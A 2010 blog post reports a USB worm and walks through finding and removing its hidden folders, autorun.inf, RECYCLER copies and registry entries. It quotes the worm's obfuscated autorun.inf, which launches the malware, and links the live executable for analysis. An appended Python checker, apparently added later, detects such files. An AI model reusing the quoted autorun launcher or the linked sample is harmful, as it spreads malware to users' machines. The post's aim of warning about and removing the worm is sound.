A Wok in the Mountains

Cooking, hiking and other adventures brought to you fresh from the Rockies.

Location: Colorado, United States

I seek to follow the Master in all things, and to be like Him in every way.

Sunday, March 14, 2010

Nasty USB Virus

While I've found a number of articles on this virus in other languages, I have yet to find any comprehensive reports of it in English (particularly the USB-infecting derivative) -- so here's one to let you all know about this.

Using a personal USB drive in public computing labs is always a risky undertaking, but usually the benefits outweigh the risks. Additionally, if you take good care of your drive and keep a UNIX computer handy, it's generally not too hard to minimize the risk and deal with infections when they do (inevitably) arise.

And when the autorun dialog pops up and the top option /isn't/ what it would be if Windows were using your custom autorun.inf, you know you've got a problem. Lately I've discovered one virus in particular which is the subject of this post. I'll talk about detection and removal, then invite analysis of the main executable (renamed to "nissan.___" from "nissan.exe", it can be found here -- download at your own risk).

The virus hid its executable and a Desktop.ini (which I neglected to save) in a system-hidden folder on my USB drive named either KARINA, DRUGIM ("friends"?), or K (all in caps, longer than the others -- sorry, I didn't write this one down). All of these can be seen with "dir /A" (which lists files regardless of their hidden and system attributes) or "ls -a" (if you have the UNIX coreutils installed). The folders and their contents can be deleted with "del /A /F FILE" or "rm -rf FILE", but unfortunately that's not the only step involved.

They all create or modify autorun.inf on the USB drive, so that needs to be removed. Additionally, they will have copied their executable to the main hard drive's RECYCLER folder, under one of the subfolders whose names begin with "S-1-5-" (RECYCLER keeps one such SID-named subfolder per user). I find the best way to find them is to use "ls -al *" to list each subfolder's contents. You can then remove them the same way as above.

The last thing to do is remove the registry entries created -- there is a page on that here.

(Note: in order to do the above steps, I had to end explorer.exe and its process tree, which includes nissan.exe, then run cmd and use that. This is because nissan.exe keeps its own executable and autorun.inf in use while running, which it does as part of Winlogon when you run explorer.exe)

I'm interested to hear analysis of the executable -- let me know what you all find.

UPDATE 03-16-2010: Just had another run-in with this virus (I believe it's in the base image of every single lab computer). This time, I copied the autorun.inf it created. You can see that the exe is named differently and contained in a different folder this time -- but it's the same pattern and the autorun.inf is nearly identical.

I:\>cat autorun.inf
[autorun
$STATICSHITfasfSAfwqfjwqLOjFASFjaSLFjWLQfWFJWQLFjWLQjfwlqjfwlqfjILGFJALFJAWLCNASLIKJFWLFJWQFJWlfjWQwqLJFwqFwqJFWLQfjWLQFWQ
open=POGRESHILI///sudbinemi.exe
~dskaldkasjdiwqjdw
action=Open foldero view files usingindowsxplorer
&kjfasFkajfiwfjiwq
!ksoafasfjwifjwif
icon=%SystemRoot%\system32\SHELL32.dll,4
)djsaikfjaikfJWFwfwq
Shell\open\command=POGRESHILI///sudbinemi.exe
fasflwFwFWqkfwofjwWwq
shell\open\command=POGRESHILI///sudbinemi.exe
"mfsakfjasKFJasFajfalsfas
USEAUTOPLAY=1
*asmkddjkaDjAKfjjwlqfjwlqfjWQfjWQJFWQiljfwQ
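A small checker, added here as an example and not part of the original post, that reads an autorun.inf the way Windows' lenient INI reader does (skipping lines with no "=") and flags the traits visible in the listing above: the junk padding lines, the section header with no closing "]", open/shell commands that launch an .exe, and the mangled copy of Explorer's own "Open folder to view files" prompt. The sample it parses is constructed to mirror that listing.

```python
import re

# Constructed sample modelled on the autorun.inf quoted above: junk lines
# interleaved with the real keys, and a section header missing its "]".
SAMPLE_AUTORUN = r"""[autorun
$STATICjunkLINEfasfSAfwqfjwq
open=POGRESHILI///sudbinemi.exe
~dskaldkasjdiwqjdw
action=Open foldero view files usingindowsxplorer
icon=%SystemRoot%\system32\SHELL32.dll,4
Shell\open\command=POGRESHILI///sudbinemi.exe
USEAUTOPLAY=1
*asmkddjkaDjAKfjjwlqfjwlqfjWQfjWQJFWQiljfwQ
"""
# Explorer's genuine prompt text, which the sample's "action" line imitates.
EXPLORER_ACTION = "open folder to view files using windows explorer"
KEY_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9_\\]*)\s*=\s*(.*?)\s*$")

def parse_autorun(text):
    """Return ({key_lower: value}, junk_line_count). Lines without '=' are
    skipped, mirroring the lenient INI reader that lets this padding work."""
    entries, junk = {}, 0
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            entries[m.group(1).lower()] = m.group(2)
        elif line.strip() and not line.strip().startswith("["):
            junk += 1
    return entries, junk

def assess_autorun(text):
    """Return a list of findings; an empty list means nothing looked odd."""
    entries, junk = parse_autorun(text)
    findings = []
    if "[autorun" in text.lower() and "[autorun]" not in text.lower():
        findings.append("section header is missing its closing ']'")
    if junk > 2:
        findings.append(f"{junk} junk lines pad the file (obfuscation)")
    for key in ("open", "shell\\open\\command", "shellexecute"):
        val = entries.get(key, "")
        if val.lower().endswith(".exe"):
            findings.append(f"{key} launches an executable: {val}")
        if "///" in val:
            findings.append(f"{key} uses a run of slashes in its path: {val}")
    action = entries.get("action", "").lower()
    if "view files" in action and action != EXPLORER_ACTION:
        findings.append("action text is a mangled copy of Explorer's own prompt")
    return findings
```

Run it against the autorun.inf on a suspect drive (after unhiding it with "dir /A") before trusting the AutoPlay prompt; a benign file with only icon and label entries produces no findings.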